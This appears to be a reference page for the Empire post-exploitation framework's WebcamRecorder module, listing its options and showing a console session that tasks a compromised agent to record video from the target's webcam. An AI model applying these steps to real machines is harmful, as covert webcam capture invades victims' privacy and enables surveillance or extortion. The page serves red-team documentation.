Start-WebcamRecorder - Empire Module


This page contains detailed information about how to use the powershell/collection/WebcamRecorder Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Start-WebcamRecorder
Module: powershell/collection/WebcamRecorder
Source code: empire/server/modules/powershell/collection/WebcamRecorder.yaml
MITRE ATT&CK: T1125
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No

The WebcamRecorder module uses the DirectX.Capture and DShowNET .NET assemblies to capture video from a webcam.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the WebcamRecorder module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the WebcamRecorder module:

Agent
Agent to run the module on.

Additional Module Options


This is a list of additional options that are supported by the WebcamRecorder module:

OutPath
Temporary save path for the .avi file. Defaults to the current users APPDATA\roaming directory.

RecordTime
Length of time to record in seconds. Defaults to 5.

WebcamRecorder Example Usage


Here's an example of how to use the WebcamRecorder module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/WebcamRecorder

 Author       @xorrior                                                             
 Background   False                                                                
 Comments     comment                                                              
              https://github.com/xorrior/RandomPS-Scripts/blob/master/Start-       
              WebcamRecorder.ps1                                                   
 Description  This module uses the DirectX.Capture and DShowNET .NET assemblies to 
              capture video from a webcam.                                         
 Language     powershell                                                           
 Name         powershell/collection/WebcamRecorder                                 
 NeedsAdmin   False                                                                
 OpsecSafe    False                                                                
 Techniques   http://attack.mitre.org/techniques/T1125                             


,Record Options------,----------,-------------------------------------,
| Name       | Value | Required | Description                         |
|------------|-------|----------|-------------------------------------|
| Agent      |       | True     | Agent to run the module on.         |
|------------|-------|----------|-------------------------------------|
| OutPath    |       | False    | Temporary save path for the .avi    |
|            |       |          | file. Defaults to the current users |
|            |       |          | APPDATA\roaming directory           |
|------------|-------|----------|-------------------------------------|
| RecordTime |       | False    | Length of time to record in         |
|            |       |          | seconds. Defaults to 5.             |
'------------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/WebcamRecorder) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/WebcamRecorder) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.